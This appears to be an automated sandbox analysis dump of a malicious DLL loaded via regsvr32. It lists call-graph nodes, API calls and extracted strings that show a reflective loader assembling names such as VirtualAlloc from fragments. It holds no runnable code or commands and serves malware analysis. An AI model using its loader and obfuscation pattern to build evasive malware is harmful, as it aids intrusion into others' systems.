_invalid_parameter 17 API calls 17953->17956 17955 7fef750eadf 17954->17955 17957 7fef750eec0 25 API calls 17954->17957 17966 7fef750da75 17954->17966 17958 7fef750ef10 25 API calls 17955->17958 17972 7fef750dbe9 _LocaleUpdate::~_LocaleUpdate 17956->17972 17957->17955 17959 7fef750eafd 17958->17959 17960 7fef750eb33 17959->17960 17963 7fef750eec0 25 API calls 17959->17963 17961 7fef750ec29 17960->17961 17975 7fef750eb49 _CrtMemDumpAllObjectsSince 17960->17975 17962 7fef750ef10 25 API calls 17961->17962 17964 7fef750ebda 17962->17964 17963->17960 17964->17966 17971 7fef750eec0 25 API calls 17964->17971 17965 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17968 7fef750ed9e 17965->17968 17967 7fef750eca1 17966->17967 17970 7fef750dbb5 17966->17970 17969 7fef74fbd70 _invalid_parameter 17 API calls 17967->17969 17967->17972 17969->17972 17973 7fef74fbd70 _invalid_parameter 17 API calls 17970->17973 17971->17966 17972->17965 17973->17972 17974 7fef750f000 wcsxfrm 2 API calls 17974->17975 17975->17964 17975->17974 17976 7fef750ee40 25 API calls 17975->17976 17976->17975 17515 7fef75113e0 17518 7fef750aee0 17515->17518 17519 7fef750af47 LeaveCriticalSection 17518->17519 17520 7fef750aef7 17518->17520 17522 7fef750af45 17519->17522 17520->17519 17521 7fef750af0b 17520->17521 17524 7fef74f9360 LeaveCriticalSection 17521->17524 17524->17522 17525 7fef750bfde 17535 7fef750c00c 17525->17535 17526 7fef750b99c 17527 7fef750cc93 17526->17527 17531 7fef750bada 17526->17531 17528 7fef74fbd70 _invalid_parameter 17 API calls 17527->17528 17530 7fef750bb0e _LocaleUpdate::~_LocaleUpdate 17527->17530 17528->17530 17529 7fef750b530 wctomb_s 19 API calls 17529->17535 17532 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17530->17532 17534 7fef74fbd70 _invalid_parameter 17 API calls 17531->17534 17533 7fef750cd90 17532->17533 17534->17530 17535->17526 17535->17529 16555 7fef74f7de0 16556 7fef74f7ded 16555->16556 16560 7fef74f7df2 std::exception::_Copy_str _calloc_dbg 16555->16560 16562 7fef74faa40 16556->16562 16558 7fef74f7e0e 16560->16558 16566 7fef74fd490 16560->16566 16576 7fef74f7ff0 16560->16576 16563 7fef74faa57 16562->16563 16564 7fef74faa4d 16562->16564 16563->16560 16580 7fef74f9c10 16564->16580 16567 7fef74fd4b1 16566->16567 16568 7fef74fd512 16567->16568 16570 7fef74fd550 _calloc_dbg_impl 16567->16570 16569 7fef74fbd70 _invalid_parameter 17 API calls 16568->16569 16572 7fef74fd546 _calloc_dbg_impl 16569->16572 16571 7fef74fd63e 16570->16571 16574 7fef74fd67c _calloc_dbg_impl 16570->16574 16573 7fef74fbd70 _invalid_parameter 17 API calls 16571->16573 16572->16560 16573->16572 16574->16572 16575 7fef74fbd70 _invalid_parameter 17 API calls 16574->16575 16575->16572 16577 7fef74f800e 16576->16577 16578 7fef74f8010 16576->16578 16577->16560 16579 7fef74fbe00 _invoke_watson_if_oneof 16 API calls 16578->16579 16579->16577 16581 7fef74f9c2a 16580->16581 16590 7fef74f9b10 16581->16590 16583 7fef74f9c34 16594 7fef74f9f20 16583->16594 16585 7fef74f9c51 16587 7fef74f9ecd 16585->16587 16600 7fef74fa000 16585->16600 16587->16563 16588 7fef74f9ce8 16588->16587 16613 7fef74f9360 LeaveCriticalSection 16588->16613 16591 7fef74f9b19 16590->16591 16593 7fef74f9bde 16591->16593 16614 7fef74f9360 LeaveCriticalSection 16591->16614 16593->16583 16595 7fef74f9f49 16594->16595 16596 7fef74f9f81 16595->16596 16597 7fef74f9f5b GetOEMCP 16595->16597 16598 7fef74f9f88 GetACP 16596->16598 16599 7fef74f9f79 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16596->16599 16597->16599 16598->16599 16599->16585 16601 7fef74f9f20 __initmbctable 2 API calls 16600->16601 16602 7fef74fa028 16601->16602 16603 7fef74fa234 16602->16603 16608 7fef74fa039 __initmbctable 16602->16608 16609 7fef74fa08e __initmbctable 16602->16609 16605 7fef74fa25d IsValidCodePage 16603->16605 16603->16608 16604 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16606 7fef74fa470 16604->16606 16607 7fef74fa27b GetCPInfo 16605->16607 16605->16608 16606->16588 16607->16608 16611 7fef74fa295 __initmbctable 16607->16611 16608->16604 16615 7fef74fa5e0 GetCPInfo 16609->16615 16612 7fef74fa5e0 __initmbctable 19 API calls 16611->16612 16612->16608 16613->16587 16614->16593 16618 7fef74fa61f 16615->16618 16624 7fef74fa7dc 16615->16624 16616 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16617 7fef74faa30 16616->16617 16617->16608 16619 7fef74ff4d0 _CrtMemDumpAllObjectsSince_stat 3 API calls 16618->16619 16620 7fef74fa734 16619->16620 16626 7fef74fef00 16620->16626 16622 7fef74fa788 16623 7fef74fef00 __initmbctable 7 API calls 16622->16623 16623->16624 16624->16616 16625 7fef74fa80a 16624->16625 16625->16608 16627 7fef74fef2c _CrtMemDumpAllObjectsSince 16626->16627 16630 7fef74fefb0 16627->16630 16629 7fef74fef8e _LocaleUpdate::~_LocaleUpdate 16629->16622 16631 7fef74fefd4 __initmbctable 16630->16631 16632 7fef74ff068 MultiByteToWideChar 16631->16632 16637 7fef74ff0ac malloc _MarkAllocaS 16632->16637 16638 7fef74ff0a5 _CrtMemDumpAllObjectsSince_stat 16632->16638 16633 7fef74ff122 MultiByteToWideChar 16634 7fef74ff164 LCMapStringW 16633->16634 16633->16638 16635 7fef74ff1a8 16634->16635 16634->16638 16636 7fef74ff1b8 16635->16636 16644 7fef74ff222 malloc _MarkAllocaS 16635->16644 16636->16638 16639 7fef74ff1d9 LCMapStringW 16636->16639 16637->16633 16637->16638 16638->16629 16639->16638 16640 7fef74ff2ac LCMapStringW 16640->16638 16641 7fef74ff2ea 16640->16641 16642 7fef74ff341 WideCharToMultiByte 16641->16642 16643 7fef74ff2f4 WideCharToMultiByte 16641->16643 16642->16638 16643->16638 16644->16638 16644->16640 18834 7fef75014e1 18835 7fef75014ef DecodePointer 18834->18835 18836 7fef7501520 DecodePointer 18834->18836 18835->18836 18838 7fef750150f 18835->18838 18837 7fef7501540 18836->18837 18839 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18837->18839 18838->18836 18840 7fef750157a 18839->18840 16659 7fef74f35e1 16660 7fef74f35f1 16659->16660 16664 7fef74f35ea 16659->16664 16660->16664 16665 7fef74f12b0 16660->16665 16663 7fef74f12b0 14 API calls 16663->16664 16666 7fef74f12de CoLoadLibrary 16665->16666 16673 7fef74f2f8c 16665->16673 16667 7fef74f2f2e VirtualAlloc RtlAllocateHeap 16666->16667 16668 7fef74f2f0f MessageBoxA ExitProcess 16666->16668 16671 7fef74f2f73 _calloc_dbg_impl 16667->16671 16667->16673 16669 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16670 7fef74f30ff 16669->16670 16670->16663 16670->16664 16672 7fef74f2f83 CoTaskMemFree 16671->16672 16672->16673 16673->16669 17536 7fef74f3fe1 17537 7fef74f3fea SetLastError 17536->17537 18447 7fef7505de0 18452 7fef74f3170 18447->18452 18451 7fef7505e86 18453 7fef74f31ac 18452->18453 18454 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18453->18454 18455 7fef74f3263 18454->18455 18455->18451 18456 7fef74f3870 18455->18456 18457 7fef74f39db __SehTransFilter 18456->18457 18458 7fef74f38de __SehTransFilter 18456->18458 18457->18451 18458->18457 18459 7fef74f3a71 RtlUnwindEx 18458->18459 18459->18457 18460 7fef750ade0 18465 7fef750fee0 18460->18465 18463 7fef750adf9 18466 7fef750ff00 _fflush_nolock 25 API calls 18465->18466 18467 7fef750ade9 18466->18467 18467->18463 18468 7fef750fc70 18467->18468 18474 7fef750fc86 18468->18474 18469 7fef750fd59 18486 7fef74f9360 LeaveCriticalSection 18469->18486 18471 7fef750fd63 18471->18463 18473 7fef750fd09 DeleteCriticalSection 18473->18474 18474->18469 18474->18473 18475 7fef7510580 18474->18475 18476 7fef7510599 18475->18476 18477 7fef75105ef 18476->18477 18478 7fef751062a 18476->18478 18480 7fef74fbd70 _invalid_parameter 17 API calls 18477->18480 18482 7fef7510623 18478->18482 18487 7fef750ae10 18478->18487 18480->18482 18481 7fef7510651 18491 7fef7510680 18481->18491 18482->18474 18484 7fef751065c 18485 7fef750aee0 2 API calls 18484->18485 18485->18482 18486->18471 18488 7fef750ae77 EnterCriticalSection 18487->18488 18489 7fef750ae27 18487->18489 18490 7fef750ae3b 18488->18490 18489->18488 18489->18490 18490->18481 18494 7fef7510699 18491->18494 18492 7fef75106ef 18497 7fef74fbd70 _invalid_parameter 17 API calls 18492->18497 18493 7fef751072d 18495 7fef7510723 18493->18495 18496 7fef750fdf0 _fflush_nolock 17 API calls 18493->18496 18494->18492 18494->18493 18495->18484 18498 7fef7510752 18496->18498 18497->18495 18499 7fef750afb0 _fflush_nolock 17 API calls 18498->18499 18500 7fef751076a 18499->18500 18502 7fef7510a20 18500->18502 18503 7fef7510a53 18502->18503 18510 7fef7510a33 __doserrno 18502->18510 18504 7fef7510abc __doserrno 18503->18504 18509 7fef7510b05 18503->18509 18507 7fef74fbd70 _invalid_parameter 17 API calls 18504->18507 18505 7fef7510bd2 18506 7fef750fae0 _fflush_nolock 3 API calls 18505->18506 18508 7fef7510bdb 18506->18508 18507->18510 18514 7fef7510c13 18508->18514 18516 7fef7510c80 18508->18516 18509->18505 18511 7fef7510b89 __doserrno 18509->18511 18510->18495 18513 7fef74fbd70 _invalid_parameter 17 API calls 18511->18513 18513->18510 18529 7fef750fbc0 LeaveCriticalSection 18514->18529 18517 7fef750f900 _fflush_nolock 17 API calls 18516->18517 18519 7fef7510c91 18517->18519 18518 7fef7510d05 18530 7fef750f7d0 18518->18530 18519->18518 18521 7fef750f900 _fflush_nolock 17 API calls 18519->18521 18528 7fef7510ce5 18519->18528 18523 7fef7510cd6 18521->18523 18522 7fef750f900 _fflush_nolock 17 API calls 18524 7fef7510cf8 CloseHandle 18522->18524 18526 7fef750f900 _fflush_nolock 17 API calls 18523->18526 18524->18518 18527 7fef7510d0f GetLastError 18524->18527 18525 7fef7510d22 _dosmaperr 18525->18514 18526->18528 18527->18518 18528->18518 18528->18522 18529->18510 18531 7fef750f7e3 18530->18531 18532 7fef750f878 __doserrno 18530->18532 18531->18532 18533 7fef750f87a SetStdHandle 18531->18533 18534 7fef750f86a 18531->18534 18532->18525 18533->18532 18535 7fef750f871 18534->18535 18536 7fef750f889 SetStdHandle 18534->18536 18535->18532 18537 7fef750f898 SetStdHandle 18535->18537 18536->18532 18537->18532 18841 7fef75048e0 18842 7fef75048f7 std::bad_exception::~bad_exception 18841->18842 18843 7fef750490c 18842->18843 18844 7fef750d710 _Ref_count LeaveCriticalSection 18842->18844 18844->18843 18004 7fef75012e3 LoadLibraryW 18005 7fef7501304 GetProcAddress 18004->18005 18013 7fef75012fd 18004->18013 18006 7fef750132a 7 API calls 18005->18006 18005->18013 18007 7fef75013b3 GetProcAddress EncodePointer 18006->18007 18008 7fef75013d5 18006->18008 18007->18008 18011 7fef75013f9 DecodePointer DecodePointer 18008->18011 18014 7fef7501428 DecodePointer 18008->18014 18009 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18010 7fef750157a 18009->18010 18011->18014 18013->18009 18014->18013 18015 7fef74f7ae3 18018 7fef74f7af3 18015->18018 18016 7fef74f7ce0 SetHandleCount 18024 7fef74f7c74 18016->18024 18017 7fef74f7c7b 18017->18016 18018->18016 18018->18017 18019 7fef74f7b95 GetStdHandle 18018->18019 18019->18017 18020 7fef74f7bb9 18019->18020 18020->18017 18021 7fef74f7bc8 GetFileType 18020->18021 18021->18017 18022 7fef74f7beb InitializeCriticalSectionAndSpinCount 18021->18022 18022->18017 18022->18024 18845 7fef75044e5 18850 7fef750445a __SehTransFilter 18845->18850 18846 7fef75047d7 18847 7fef750485b 18846->18847 18848 7fef74fcf80 _inconsistency 36 API calls 18846->18848 18848->18847 18849 7fef750466c __SehTransFilter 18849->18846 18851 7fef7505bb0 __SehTransFilter 36 API calls 18849->18851 18850->18849 18852 7fef7505180 __SehTransFilter 38 API calls 18850->18852 18853 7fef7504727 18851->18853 18852->18850 18853->18846 18854 7fef74fe500 __SetUnwindTryBlock 37 API calls 18853->18854 18855 7fef7504767 18854->18855 18856 7fef74fedc0 __SehTransFilter 9 API calls 18855->18856 18856->18846 18857 7fef74f70e6 18858 7fef74f7090 _exit 33 API calls 18857->18858 18859 7fef74f70f0 18858->18859 18556 7fef75075e9 18557 7fef75075f4 18556->18557 18560 7fef75075fb 18556->18560 18558 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18557->18558 18559 7fef7507d85 18558->18559 18561 7fef74fbd70 _invalid_parameter 17 API calls 18560->18561 18561->18557 17538 7fef74fa7e9 17539 7fef74fa7f9 17538->17539 17540 7fef74fa80a 17539->17540 17541 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17539->17541 17542 7fef74faa30 17541->17542 17543 7fef74fc7e9 17544 7fef74fc90c EncodePointer EncodePointer 17543->17544 17545 7fef74fc80d 17543->17545 17548 7fef74fc8ca 17544->17548 17547 7fef74fc872 17545->17547 17552 7fef74f4a00 17545->17552 17547->17548 17549 7fef74f4a00 _realloc_dbg 30 API calls 17547->17549 17550 7fef74fc8ce EncodePointer 17547->17550 17551 7fef74fc8bd 17549->17551 17550->17544 17551->17548 17551->17550 17553 7fef74f4a22 17552->17553 17558 7fef74f4a70 17553->17558 17555 7fef74f4a4c 17569 7fef74f9360 LeaveCriticalSection 17555->17569 17557 7fef74f4a5b 17557->17547 17559 7fef74f4ad4 _realloc_dbg 17558->17559 17568 7fef74f4aae _calloc_dbg_impl 17558->17568 17560 7fef74f6380 _CrtIsValidHeapPointer HeapValidate 17559->17560 17559->17568 17565 7fef74f4e2c 17560->17565 17561 7fef74f4f90 17585 7fef74fba60 17561->17585 17562 7fef74f4f64 17570 7fef74fbc30 17562->17570 17565->17561 17565->17562 17565->17568 17566 7fef74f4fa6 17567 7fef74f4fba HeapSize 17566->17567 17566->17568 17567->17568 17568->17555 17569->17557 17571 7fef74fbc5f 17570->17571 17572 7fef74fbc50 17570->17572 17574 7fef74fbc67 17571->17574 17579 7fef74fbc78 17571->17579 17596 7fef74fabf0 17572->17596 17575 7fef74fc020 _free_base 2 API calls 17574->17575 17584 7fef74fbc5a _get_errno_from_oserr 17575->17584 17576 7fef74fbcba 17578 7fef74fabb0 _callnewh DecodePointer 17576->17578 17577 7fef74fbc9a HeapReAlloc 17577->17579 17578->17584 17579->17576 17579->17577 17580 7fef74fbce4 17579->17580 17582 7fef74fabb0 _callnewh DecodePointer 17579->17582 17583 7fef74fbd1f GetLastError 17579->17583 17581 7fef74fbcee GetLastError 17580->17581 17580->17584 17581->17584 17582->17579 17583->17584 17584->17568 17586 7fef74fba76 17585->17586 17587 7fef74fbb07 17586->17587 17588 7fef74fbacc 17586->17588 17589 7fef74fbb32 HeapSize HeapReAlloc 17587->17589 17593 7fef74fbb00 _get_errno_from_oserr 17587->17593 17591 7fef74fbd70 _invalid_parameter 17 API calls 17588->17591 17590 7fef74fbb74 17589->17590 17589->17593 17592 7fef74fbba0 GetLastError 17590->17592 17602 7fef74fbbd0 HeapQueryInformation 17590->17602 17591->17593 17592->17593 17593->17566 17597 7fef74fac4d 17596->17597 17599 7fef74fac0a 17596->17599 17598 7fef74fabb0 _callnewh DecodePointer 17597->17598 17601 7fef74fac21 17598->17601 17600 7fef74fabb0 _callnewh DecodePointer 17599->17600 17599->17601 17600->17599 17601->17584 17603 7fef74fbb90 17602->17603 17603->17592 17603->17593 18052 7fef7509aeb 18053 7fef7509b18 18052->18053 18054 7fef7509b2c 18052->18054 18055 7fef7509520 19 API calls 18053->18055 18056 7fef750ab10 17 API calls 18054->18056 18055->18054 18062 7fef7509b38 18056->18062 18057 7fef7509c04 18058 7fef750a1cb 18057->18058 18059 7fef7509c23 GetConsoleCP 18057->18059 18060 7fef750a205 18058->18060 18061 7fef750a8ad WriteFile 18058->18061 18081 7fef7509c4d 18059->18081 18063 7fef750a400 18060->18063 18066 7fef750a21a 18060->18066 18064 7fef750a923 GetLastError 18061->18064 18078 7fef7509dd9 _dosmaperr __doserrno 18061->18078 18062->18057 18065 7fef7509bae GetConsoleMode 18062->18065 18069 7fef750a40e 18063->18069 18082 7fef750a5f3 18063->18082 18064->18078 18065->18057 18067 7fef750a33e WriteFile 18066->18067 18066->18078 18067->18066 18070 7fef750a3ea GetLastError 18067->18070 18068 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18071 7fef750a9f5 18068->18071 18072 7fef750a531 WriteFile 18069->18072 18069->18078 18070->18078 18072->18069 18077 7fef750a5dd GetLastError 18072->18077 18073 7fef750a726 WideCharToMultiByte 18076 7fef750a791 GetLastError 18073->18076 18073->18082 18074 7fef7509f66 WideCharToMultiByte 18075 7fef7509fbf WriteFile 18074->18075 18074->18078 18079 7fef750a050 GetLastError 18075->18079 18075->18081 18076->18078 18077->18078 18078->18068 18079->18078 18079->18081 18080 7fef750a7b0 WriteFile 18080->18082 18083 7fef750a857 GetLastError 18080->18083 18081->18074 18081->18078 18084 7fef750a06d WriteFile 18081->18084 18085 7fef750a158 GetLastError 18081->18085 18087 7fef750f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 18081->18087 18088 7fef750fc00 WriteConsoleW CreateFileW _putwch_nolock 18081->18088 18089 7fef750a1b5 GetLastError 18081->18089 18082->18073 18082->18078 18082->18080 18083->18082 18084->18081 18086 7fef750a103 GetLastError 18084->18086 18085->18078 18086->18078 18087->18081 18088->18081 18089->18078 18562 7fef74f91ea 18563 7fef74f91ef 18562->18563 18564 7fef74f74e0 __crtExitProcess 3 API calls 18563->18564 18565 7fef74f9203 18564->18565 18864 7fef74fd0ea 18865 7fef74fd0ef 18864->18865 18866 7fef74f7090 _exit 33 API calls 18865->18866 18867 7fef74fd209 18865->18867 18871 7fef74fd0fc 18865->18871 18866->18867 18869 7fef74fd289 18867->18869 18872 7fef74f3d00 RtlEncodePointer 18867->18872 18869->18871 18873 7fef74f9360 LeaveCriticalSection 18869->18873 18872->18869 18873->18871

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.919820408.000007FEF74F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF74F0000, based on PE: true
                                                                    • Associated: 00000005.00000002.919817428.000007FEF74F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000005.00000002.919837980.000007FEF7512000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000005.00000002.919844833.000007FEF751B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000005.00000002.919848379.000007FEF751F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7fef74f0000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AllocAllocateExitFreeHeapLibraryLoadMessageProcessTaskVirtual
                                                                    • String ID: %<$Ya]$g@$$|X$ 4bB$!@C+$"V2$#z$U$$931$$:*:$$D1v$$huN$$}%z$%8#$%</$%U9$&\hR$*hH%$+ong$+iT$-{*$-'C$.#($0kj.$0.3$1\u$2s<S$3ob$5qj'$5vCx$8<-$:!@$:'U@$:9m?$;qdf$<)@P$<M}O$<v:$=kf^$>~$?CE`$@ $BxJr$C/$Cb47$D)'U$Eekg$FLIn$HPZ$Ko*h$L ]1$M13U$M1vi$MDj$N1kj^H<M1vf@$_yiXP+o*hH*fZQl5vC5qjfXErgxjcCb4v_e75<edkge!z$U9k+h$P+oo$PX5$Puvm$QlyO$R;pB$S[L$S}pn$U+on$U9#($V#s$V9s$VO4$^*C$`AnM$aUJ'$c-_j$cDj$e7tc$ePO$gVWH$h78<$hx"$j+h$kxfc$l|f$mCl4$mbPv$pAT#$rkE@$t(O$tc`$w&ed$wC54$werfault.exe$wk/$xA\#${$U|${fM$$|e:$} z$$}'6$}WL$It$"!k$%Uc$(pd$*hH$,$n$,1.$9[+$?x?$EBg$M z$N3$Pl5$i~e$jfX$oE$`I
                                                                    • API String ID: 2181984824-2032897877
                                                                    • Opcode ID: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                                    • Instruction ID: 8a680389bafc411da5b849dbb59dd71307d3986a818d312ea38dfdcedf4ceaaf
                                                                    • Opcode Fuzzy Hash: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                                    • Instruction Fuzzy Hash: D5E2C8B690A7C18FE3748F62AA817DD3AA1F345748F609208D3991FA1DCB795242CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 15 130000-130460 call 130aa8 * 2 VirtualAlloc 37 130462-130466 15->37 38 13048a-130494 15->38 39 130468-130488 37->39 41 130a91-130aa6 38->41 42 13049a-13049e 38->42 39->38 39->39 42->41 43 1304a4-1304a8 42->43 43->41 44 1304ae-1304b2 43->44 44->41 45 1304b8-1304bf 44->45 45->41 46 1304c5-1304d2 45->46 46->41 47 1304d8-1304e1 46->47 47->41 48 1304e7-1304f4 47->48 48->41 49 1304fa-130507 48->49 50 130531-130567 GetNativeSystemInfo 49->50 51 130509-130511 49->51 50->41 53 13056d-130589 VirtualAlloc 50->53 52 130513-130518 51->52 54 130521 52->54 55 13051a-13051f 52->55 56 1305a0-1305ac 53->56 57 13058b-13059e 53->57 58 130523-13052f 54->58 55->58 59 1305af-1305b2 56->59 57->56 58->50 58->52 61 1305c1-1305db 59->61 62 1305b4-1305bf 59->62 63 13061b-130622 61->63 64 1305dd-1305e2 61->64 62->59 66 1306db-1306e2 63->66 67 130628-13062f 63->67 65 1305e4-1305ea 64->65 68 13060b-130619 65->68 69 1305ec-130609 65->69 71 130864-13086b 66->71 72 1306e8-1306f9 66->72 67->66 70 130635-130642 67->70 68->63 68->65 69->68 69->69 70->66 75 130648-13064f 70->75 73 130871-13087f 71->73 74 130917-130929 71->74 76 130702-130705 72->76 79 13090e-130911 73->79 77 130a07-130a1a 74->77 78 13092f-130937 74->78 80 130654-130658 75->80 81 130707-13070a 76->81 82 1306fb-1306ff 76->82 105 130a40-130a4a 77->105 106 130a1c-130a27 77->106 84 13093b-13093f 78->84 79->74 83 130884-1308a9 79->83 85 1306c0-1306ca 80->85 86 130788-13078e 81->86 87 13070c-13071d 81->87 82->76 111 130907-13090c 83->111 112 1308ab-1308b1 83->112 91 130945-13095a 84->91 92 1309ec-1309fa 84->92 89 13065a-130669 85->89 90 1306cc-1306d2 85->90 88 130794-1307a2 86->88 87->88 93 13071f-130720 87->93 95 1307a8 88->95 96 13085d-13085e 88->96 101 13066b-130678 89->101 102 13067a-13067e 89->102 90->80 97 1306d4-1306d5 90->97 99 13097b-13097d 91->99 100 13095c-13095e 91->100 92->84 103 130a00-130a01 92->103 104 130722-130784 93->104 108 1307ae-1307d4 95->108 96->71 97->66 116 1309a2-1309a4 99->116 117 13097f-130981 99->117 113 130960-13096c 100->113 114 13096e-130979 100->114 115 1306bd-1306be 101->115 118 130680-13068a 102->118 119 13068c-130690 102->119 103->77 104->104 120 130786 104->120 109 130a7b-130a8e 105->109 110 130a4c-130a54 105->110 107 130a38-130a3e 106->107 107->105 121 130a29-130a35 107->121 142 1307d6-1307d9 108->142 143 130835-130839 108->143 109->41 110->109 122 130a56-130a78 110->122 111->79 131 1308b3-1308b9 112->131 132 1308bb-1308c8 112->132 123 1309be-1309bf 113->123 114->123 115->85 129 1309a6-1309aa 116->129 130 1309ac-1309bb 116->130 124 130983-130987 117->124 125 130989-13098b 117->125 126 1306b6-1306ba 118->126 127 130692-1306a3 119->127 128 1306a5-1306a9 119->128 120->88 121->107 122->109 137 1309c5-1309cb 123->137 124->123 125->116 135 13098d-13098f 125->135 126->115 127->126 128->115 136 1306ab-1306b3 128->136 129->123 130->123 138 1308ea-1308fe 131->138 139 1308d3-1308e5 132->139 140 1308ca-1308d1 132->140 144 130991-130997 135->144 145 130999-1309a0 135->145 136->126 146 1309d9-1309e9 VirtualProtect 137->146 147 1309cd-1309d3 137->147 138->111 153 130900-130905 138->153 139->138 140->139 140->140 149 1307e3-1307f0 142->149 150 1307db-1307e1 142->150 151 130844-130850 143->151 152 13083b 143->152 144->123 145->137 146->92 147->146 155 1307f2-1307f9 149->155 156 1307fb-13080d 149->156 154 130812-13082c 150->154 151->108 157 130856-130857 151->157 152->151 153->112 154->143 159 13082e-130833 154->159 155->155 155->156 156->154 157->96 159->142
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.919409620.0000000000130000.00000040.00001000.00020000.00000000.sdmp, Offset: 00130000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_130000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                                                    • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                    • API String ID: 2313188843-2517549848
                                                                    • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction ID: c3ad375b28d4005cd65bc3de3fd702d44b77b28fe8b76393b77b528eb6f720f0
                                                                    • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction Fuzzy Hash: CF72D470618B488FDB2ADF18C8956B9B7E1FB98305F10462DE8CAD7211DB34D986CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.919820408.000007FEF74F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000007FEF74F0000, based on PE: true
                                                                    • Associated: 00000005.00000002.919817428.000007FEF74F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000005.00000002.919837980.000007FEF7512000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000005.00000002.919844833.000007FEF751B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000005.00000002.919848379.000007FEF751F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7fef74f0000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$Decode$_initterm$EncodeExitProcess__crt
                                                                    • String ID:
                                                                    • API String ID: 3799933513-0
                                                                    • Opcode ID: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                                    • Instruction ID: 89618c808956bf9c9c9427a355c34e12636da4f006e0b801dda56105ed07117a
                                                                    • Opcode Fuzzy Hash: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                                    • Instruction Fuzzy Hash: BB511C3692DA8282E7919B14F4443AAB7E5F388786F501135FA8E43BB9DF7CE444CB04
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.919789550.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID: z
                                                                    • API String ID: 963392458-1375040831
                                                                    • Opcode ID: 044b6e1ce48cfd18270e48a4d1ffa5fa37b68dcc1aa27e33fe08f1a26b59e50a
                                                                    • Instruction ID: 5490f85ef4092ec497088e60b932e525f0ce693db587fe3a551d92928695aba5
                                                                    • Opcode Fuzzy Hash: 044b6e1ce48cfd18270e48a4d1ffa5fa37b68dcc1aa27e33fe08f1a26b59e50a
                                                                    • Instruction Fuzzy Hash: 5141C27191C7848FD7A5DF18D08A7DAB7E0FB98318F01495DE88CC7292DB749885CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.919789550.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID: z
                                                                    • API String ID: 963392458-1375040831
                                                                    • Opcode ID: 274a6825be770f02a4f82c9f6cbe831b28a77f7637ef6bb2e3a1323e28db6850
                                                                    • Instruction ID: 90d0215384d3738c1bd812602d16852eefab8a4974bd8bae5625081230a7a3ff
                                                                    • Opcode Fuzzy Hash: 274a6825be770f02a4f82c9f6cbe831b28a77f7637ef6bb2e3a1323e28db6850
                                                                    • Instruction Fuzzy Hash: 4741377091CB848BD7B4DF18D08A7AAB7E0FB98315F10495EE88CC3252DB7498848B86
                                                                    Uniqueness

